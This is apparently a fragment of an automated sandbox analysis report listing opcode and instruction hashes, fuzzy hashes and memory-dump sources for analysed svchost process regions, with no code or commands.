                                                        • Opcode ID: 115c28a9ed207f0bebc5d1b58320dfb777dad85ea53ac6b5185b11bb7ca95d90
                                                        • Instruction ID: 0502c75757c80d80d2d93b3e92539c808075b1dff39cf9254251737f6e053e6f
                                                        • Opcode Fuzzy Hash: 115c28a9ed207f0bebc5d1b58320dfb777dad85ea53ac6b5185b11bb7ca95d90
                                                        • Instruction Fuzzy Hash: 7831F521F1D9490FE798FB2CA85A379B6D2EB99791F0401BEE40EC32D7DE289C418345
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d869635ffa9b59e877e4120e181a06c58e4d70512587f397d7b2a1a5706641c
                                                        • Instruction ID: d5eef6ee86250cfb15da7c204ee18dedd27a71bf47196a650441d7ba229cd6f7
                                                        • Opcode Fuzzy Hash: 2d869635ffa9b59e877e4120e181a06c58e4d70512587f397d7b2a1a5706641c
                                                        • Instruction Fuzzy Hash: BB31A221F1E94A5FE784B7BC581A3B976D2FFA8791F04017AE40DC3286EE285C458392
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da199da0ba99e7f57b80e4252b2843a374b5a9bbe3d325debd91b2f5a170ba1f
                                                        • Instruction ID: 68acd72130d36f6b8d9f234d9474e930b9f7ad0b8179e5f79bfe70745cbfa4dd
                                                        • Opcode Fuzzy Hash: da199da0ba99e7f57b80e4252b2843a374b5a9bbe3d325debd91b2f5a170ba1f
                                                        • Instruction Fuzzy Hash: 59419030E1E64A8FDB45FB7898557BD7BA2FF98380F5005B5D009D32C6CE3968058755
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24b6e211ce3343b25566fcb7c83dfb2471f60a662482e18f52e88c26bcc0d983
                                                        • Instruction ID: 4ecad4815933e3bc93f40e68e5fe2e68c77bed2ed980803cca2fc782457fba2a
                                                        • Opcode Fuzzy Hash: 24b6e211ce3343b25566fcb7c83dfb2471f60a662482e18f52e88c26bcc0d983
                                                        • Instruction Fuzzy Hash: 1331E12194A6495FD381EB3890A92B93FB2FFA83C0FC041E5D908C73CBCE3469048766
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c880ecee620ddfc2d4cced154bb825e845433d3ae7cdbd0be88c6b16e4015d8
                                                        • Instruction ID: bd93cd1ebe8dc493ec8221b3c87d1f35204d9fc13ce33b7474ff2705251f5d4e
                                                        • Opcode Fuzzy Hash: 1c880ecee620ddfc2d4cced154bb825e845433d3ae7cdbd0be88c6b16e4015d8
                                                        • Instruction Fuzzy Hash: 3921A231A5A6495FD751EB3894A96B97FB2FFA83C0FC045A5D908C33CACE3469048762
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdf5fbe83e84fadd3826becd4a8ec0a47bda11b05efc3a1751f399d2e94e66ce
                                                        • Instruction ID: 36f78cac36496825f3530cbc8f867cd70f94d114db541e5c6f833daa4bdf5586
                                                        • Opcode Fuzzy Hash: bdf5fbe83e84fadd3826becd4a8ec0a47bda11b05efc3a1751f399d2e94e66ce
                                                        • Instruction Fuzzy Hash: 1001262590EB850FE791BB3818551357FE09FA12C0F0804AAD888C7197D90859898356
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 243852bede3c886188c610becafa8e2ec5af04f65cad882c8143d83d2b40de21
                                                        • Instruction ID: b97a659f78d546464fee3a9a309028f54cee38286177574443fa61b42e35acd6
                                                        • Opcode Fuzzy Hash: 243852bede3c886188c610becafa8e2ec5af04f65cad882c8143d83d2b40de21
                                                        • Instruction Fuzzy Hash: 6422F220B2EA4A9FEB98F73894593B977D2FF88781F540579D04EC32C6DF28A8058745
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 817bfbc752ccef74a566559ef32609facec759d4276f66691993e83c40f7f625
                                                        • Instruction ID: 985a9d5ac80e3bb78926e78a0d068d34d6613a474338df7ce11b08b128f7ffa7
                                                        • Opcode Fuzzy Hash: 817bfbc752ccef74a566559ef32609facec759d4276f66691993e83c40f7f625
                                                        • Instruction Fuzzy Hash: 49220220B2EA499FEB98F73894593B976E2FF88781F540579D04EC32C6CF28AC058745
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 869e518e4cefb746bb3f62c9ae8fad7c507a62da47d66fb0976a11d2b0dd2b34
                                                        • Instruction ID: 5fb63d3abcd34af46ddf6424e72960b67ecd2efa7afe95c6216d506bec0befa4
                                                        • Opcode Fuzzy Hash: 869e518e4cefb746bb3f62c9ae8fad7c507a62da47d66fb0976a11d2b0dd2b34
                                                        • Instruction Fuzzy Hash: AC511110B1E6C95FD796AB3858643B67FE1DF87255F1801FBE089C7197DE08080AC356
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9M_^
                                                        • API String ID: 0-1708477388
                                                        • Opcode ID: 3846cc09e15a31fbc0cca9c67c066ca71b95fe5da586d2b1a56ea352e25fc431
                                                        • Instruction ID: 12f75c0398ee8333494c6e83db03d78639eb7fb0c22f6c6307684ad07aeb4d96
                                                        • Opcode Fuzzy Hash: 3846cc09e15a31fbc0cca9c67c066ca71b95fe5da586d2b1a56ea352e25fc431
                                                        • Instruction Fuzzy Hash: 38610325A0F61EDED700BB6DA4153FC77A2EF843A5F144276D00CC7187CE29644A87A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4M_^
                                                        • API String ID: 0-2545914641
                                                        • Opcode ID: eb86f6a3c73fa5a462567a3d2064b7a669b9039ed0c6840839978e2430d1f773
                                                        • Instruction ID: 69c22eda4b691d95355734b522978581709c96c3a7bc82539b69a1592ed5a637
                                                        • Opcode Fuzzy Hash: eb86f6a3c73fa5a462567a3d2064b7a669b9039ed0c6840839978e2430d1f773
                                                        • Instruction Fuzzy Hash: 21510321A0FBC65FE396B63898662B57BE1EF86660B0940FBD08CC7197DD1C5C468362
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae699f09f9ebefdda2f69a9bf505f12eaf45a2dd3e3bf10ffc11ae7210ad7f86
                                                        • Instruction ID: 24838f631c642908a80e8ea3a5899426423c7b2bc777fac1f7a6e6d921131568
                                                        • Opcode Fuzzy Hash: ae699f09f9ebefdda2f69a9bf505f12eaf45a2dd3e3bf10ffc11ae7210ad7f86
                                                        • Instruction Fuzzy Hash: 4C31C532D0F69A8FE705B77CA8652F97BA1EF56251F0802F7C089CB193EE1854098354
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86ef49d3344ae58acb048f938c87a1d1cc71378ce3c33c0d631a5813a8730ba8
                                                        • Instruction ID: 5fac83437d20a40785c28d27fb93af8cefdf24558ce1b74a9e8cea395b9ecc6e
                                                        • Opcode Fuzzy Hash: 86ef49d3344ae58acb048f938c87a1d1cc71378ce3c33c0d631a5813a8730ba8
                                                        • Instruction Fuzzy Hash: 36A14926B0E56EDED700BB7DA8552FD7BA1EF85376F0402B7C048CB187CA24644A87E5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a430bc2fe2fea723ab4b9ffaf45cef891651add48c58cf75b8b4c7901f15cf7e
                                                        • Instruction ID: c0ace5141fbcda9d2245cf02ae582ad7f4585dc9cd723e4bad61f738ede0c8bb
                                                        • Opcode Fuzzy Hash: a430bc2fe2fea723ab4b9ffaf45cef891651add48c58cf75b8b4c7901f15cf7e
                                                        • Instruction Fuzzy Hash: 99913426B0A56EDED700BB7DB4152F97BA1EF853B6F4442B7C048CB187CE24644A87E4
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6d3927a594fb27ca902112865f48e4131509acd70da47ca2038435d1e1a3b0f
                                                        • Instruction ID: 5a0d8b3d304dee3088214dce7f1b6fcd76c4761d84c75c69cabc1cf98a287ef4
                                                        • Opcode Fuzzy Hash: f6d3927a594fb27ca902112865f48e4131509acd70da47ca2038435d1e1a3b0f
                                                        • Instruction Fuzzy Hash: 32813626B0A52EDED700BB7DA4152FD7BA2EF853B6F144277C048C7187CE24644A87E4
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0494894dc9cadbc22685be8bbf7a22c87c61a02814647eb323b09cdab8483c50
                                                        • Instruction ID: 2fd18be24960b92ce75cc57e87e3d7725b37707265c94f50a833d4e19df07d7f
                                                        • Opcode Fuzzy Hash: 0494894dc9cadbc22685be8bbf7a22c87c61a02814647eb323b09cdab8483c50
                                                        • Instruction Fuzzy Hash: F6812526B0A52EDED700BB7DA4152F97BA2EF853B6F144277D048C7187CE24644A87E4
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45fceeaf5556ef1064a0e93724092c9cb888f9dcad8f50cf2aac5e751086f93e
                                                        • Instruction ID: c24403b2d15faffe37d2eaf45a082c462746f900cd06dc634e7fcbbd903a2524
                                                        • Opcode Fuzzy Hash: 45fceeaf5556ef1064a0e93724092c9cb888f9dcad8f50cf2aac5e751086f93e
                                                        • Instruction Fuzzy Hash: 2D713426B0A52EDED700BB7DA4152FD7BA2FF853A6F1442B6D048C7187CE24644AC7A4
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ba0d7c94f2fb6c4b0744cddc66c1210c9fc1a657602593d8b66b376de5c5659
                                                        • Instruction ID: 096cc2cf4ff703407a73294f0979d4f9887887c7e513337629ff116c8d39a34c
                                                        • Opcode Fuzzy Hash: 6ba0d7c94f2fb6c4b0744cddc66c1210c9fc1a657602593d8b66b376de5c5659
                                                        • Instruction Fuzzy Hash: E831F721F1DA490FE798FB2C9459379B6D2EB98791F0401BEE40EC32D7DE289C418341
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 912e58aa002fc144b35a0974af9849cf0a580376cf3cac2accf766f184c87368
                                                        • Instruction ID: 9be642967017690ac39fb4013937fe3419dceb222dce8f96af18d8c7edc9a916
                                                        • Opcode Fuzzy Hash: 912e58aa002fc144b35a0974af9849cf0a580376cf3cac2accf766f184c87368
                                                        • Instruction Fuzzy Hash: B031C411F1EA4A9FE744B7BC581A3F876D2FF98751F14017AE40DC3286DE285C458351
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ddfab2bdb07cdba3daf081822219d94ec66145b83fedea53d2bbc6947169568
                                                        • Instruction ID: 192c641a3857f6ae6d78326bf77384283c52e15dfe50bd3177f415523d294c0c
                                                        • Opcode Fuzzy Hash: 0ddfab2bdb07cdba3daf081822219d94ec66145b83fedea53d2bbc6947169568
                                                        • Instruction Fuzzy Hash: 08419030A1EA4D9FDB84FB6884653BDB7E2FF89342F540575D009D3286CE3968098761
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: febe68306df1d63132cc76d34dc5618daca2d7b5d6f285556eed21ac2ba41cc2
                                                        • Instruction ID: 68bf4bc160c6641f606a86a46a19e3cc83a78daebefe811083f370d9b9ad35b1
                                                        • Opcode Fuzzy Hash: febe68306df1d63132cc76d34dc5618daca2d7b5d6f285556eed21ac2ba41cc2
                                                        • Instruction Fuzzy Hash: 7E31A22490E6CD9FD385FB2C80A42B97BB2EF95286F8444A5D04CD728BCF385805C766
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7708e184bd880fdceadccd99b71449dc69211f9fb7e5d6046ff782218b31a675
                                                        • Instruction ID: 74e594bc9a17c88d04f85705ab7480aa60845925e383025bdf06e18a700b5472
                                                        • Opcode Fuzzy Hash: 7708e184bd880fdceadccd99b71449dc69211f9fb7e5d6046ff782218b31a675
                                                        • Instruction Fuzzy Hash: F221712490E68D9FD395FB2C84A46B97BB2EF94246F8444A5D44CD33CECF385904C766
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2966891694.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_23_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 23987cbf5746b4afd0614306e8002574aa0759b3485a00977e6dd57bcaf1a4e1
                                                        • Instruction ID: 96615542fb4f084d7f277d516eefd7fde007685cf325862f9e69ed71f06d2819
                                                        • Opcode Fuzzy Hash: 23987cbf5746b4afd0614306e8002574aa0759b3485a00977e6dd57bcaf1a4e1
                                                        • Instruction Fuzzy Hash: 66014925A0EBC54FE791B73918556757FF0DF92281F0804BAE8D8C70DBDA08A9898356
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf4f363719a4dc9f77d149dbbc2712e673f713296e68c2735319172e26ef6486
                                                        • Instruction ID: 91f0246cbd38dd4bcad8748a575ed753ae22161f1c1e5b03fc67ee8a412fdc31
                                                        • Opcode Fuzzy Hash: cf4f363719a4dc9f77d149dbbc2712e673f713296e68c2735319172e26ef6486
                                                        • Instruction Fuzzy Hash: 3022D220A2EA495FEB98FB3894697BD76D2FF98780F440579D00EC32C6DF286C458749
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9P_^
                                                        • API String ID: 0-1898675183
                                                        • Opcode ID: 9ab33d18aca2f7ce5f5fececbc47f3228e385ee152da69183703361900b7842a
                                                        • Instruction ID: de229dda4c869d4845c07630f20cc48221887e753b3e95e1d6a603b4f01d7ff1
                                                        • Opcode Fuzzy Hash: 9ab33d18aca2f7ce5f5fececbc47f3228e385ee152da69183703361900b7842a
                                                        • Instruction Fuzzy Hash: 71611426A0E51A9EE704BBBDA4557FD37A5FF883A0F444576D00CC71C7CE24648A87B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4P_^
                                                        • API String ID: 0-2202116914
                                                        • Opcode ID: 9157e1ba54fb881516faecc9773ace2cc310913977769d1d8c6eea173ae553e1
                                                        • Instruction ID: 1361c4843ae4687d0cadd2364c3c466f80a10fbd36161b3b08eccaf0588c18a0
                                                        • Opcode Fuzzy Hash: 9157e1ba54fb881516faecc9773ace2cc310913977769d1d8c6eea173ae553e1
                                                        • Instruction Fuzzy Hash: 13512721A0FA861FE396B77C985A2B57BE1DF86760B0900FBD08CC7197DD185C468366
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daeb6c02dac63c64c4f3f4ba9cdf882d58248e1f342c25867e76659549263898
                                                        • Instruction ID: 677cdf9aec6ffc01ac0ce2f1b02170518b60c5b392687553d46e6d2c2b6906d4
                                                        • Opcode Fuzzy Hash: daeb6c02dac63c64c4f3f4ba9cdf882d58248e1f342c25867e76659549263898
                                                        • Instruction Fuzzy Hash: 5121B633D0E6965FE741F77CA8A62E93BA1FF45360F0801F7D088DB193EA1858098368
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1b5f34f19f826795b404af85408aa1e503df2ece459ebca5b91349e831a60fe1
                                                        • Instruction ID: 3882efe56e140e84c44bfad71373d23cfacce90fbf84e5662a5c079d11a7af5d
                                                        • Opcode Fuzzy Hash: 1b5f34f19f826795b404af85408aa1e503df2ece459ebca5b91349e831a60fe1
                                                        • Instruction Fuzzy Hash: 25A1263AA0E5269EE300BBBDB8556ED3B65FF85371F044577D148CB087CA24648A87F4
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f05bf34a19679ec616fe740a2676930dd6fbe30e3836080ca3c110e7251f99a
                                                        • Instruction ID: b209d28509e94bbfb7c7936edd866ea0efd3ce1bc65c0f4737f90fd688d0c872
                                                        • Opcode Fuzzy Hash: 0f05bf34a19679ec616fe740a2676930dd6fbe30e3836080ca3c110e7251f99a
                                                        • Instruction Fuzzy Hash: 0A91273AA0A516AEE300BBBDB4556FD3BA5FF84371F444577D148CB1C7CA24248A87B8
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 791b884c305360af5d9713468cf52c912256c213896befd614f37c08ca939082
                                                        • Instruction ID: dcf330e21db68ac238090ca777c3514e529d6697797631e01fb83e162b8ce366
                                                        • Opcode Fuzzy Hash: 791b884c305360af5d9713468cf52c912256c213896befd614f37c08ca939082
                                                        • Instruction Fuzzy Hash: AD812736A0A516AEE300BBBDB8556FD3BA5FF84371F044577D048CB1C7CA24248A87B8
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 404ec0e61e6e21c0113e70168e17cd6767afa18741ef0bf35dc2615741761fed
                                                        • Instruction ID: 1b121e7ce87e4351d4e6f44285a6e5f3ad366745fd3999b3500d1f5a6520638c
                                                        • Opcode Fuzzy Hash: 404ec0e61e6e21c0113e70168e17cd6767afa18741ef0bf35dc2615741761fed
                                                        • Instruction Fuzzy Hash: C9812736A0A516AEE700BBBDB4556FD3BA5FF84371F044577D048C71C7CA24248A87B8
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5811841476fac6e3cb8703d4ba7fcc3d8b6f28b42e003da1f66fb82fb23a9f9
                                                        • Instruction ID: dbddd68fc20de3a9560aa2d4378b1aa933dd7a9df2486025cf3602700b194b1c
                                                        • Opcode Fuzzy Hash: d5811841476fac6e3cb8703d4ba7fcc3d8b6f28b42e003da1f66fb82fb23a9f9
                                                        • Instruction Fuzzy Hash: 0871263AA0A516AEE300BBBDB8556FD3BA5FF84361F444577D048C71C7CA24648AC7B8
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10a86467b285476195a74c47ca33c16a2993dbfa414042dfca62cf29629f360e
                                                        • Instruction ID: 899dc8726c6b61f76abb95439dd2df72fe6866f5b4dbb52080f28fc7cb06cf8b
                                                        • Opcode Fuzzy Hash: 10a86467b285476195a74c47ca33c16a2993dbfa414042dfca62cf29629f360e
                                                        • Instruction Fuzzy Hash: DF31C121E1E9499FE744B7AC581A3BD76E2FF98751F04027AE00DC36C6DE286C458791
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a055be4a0533bd9cd04f4a2b711c25a4740d5276503906aeeab79cc6e9260cd
                                                        • Instruction ID: bc16412e20f4934e6f9b86f585bf5126e034e12638f4bc94277c04750e2b63e8
                                                        • Opcode Fuzzy Hash: 1a055be4a0533bd9cd04f4a2b711c25a4740d5276503906aeeab79cc6e9260cd
                                                        • Instruction Fuzzy Hash: AF419E30A1E6498FEB44FBA898657BD7BA2FF88341F940479D009D32CADE3868458755
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 321f9ea7280da833f0aa3c307ac73ca8b630bec2e778f501a23569baff36b212
                                                        • Instruction ID: 344fcfa3882dba5f51c8c361929a927258cd0aa930255bb212ccf5e0868baea0
                                                        • Opcode Fuzzy Hash: 321f9ea7280da833f0aa3c307ac73ca8b630bec2e778f501a23569baff36b212
                                                        • Instruction Fuzzy Hash: 1131B42155A6495FD344FB6890B82BA3FB2FF95240FD444AAD008C73CFCF346885976A
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.3312827361.00007FF848D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff848d70000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
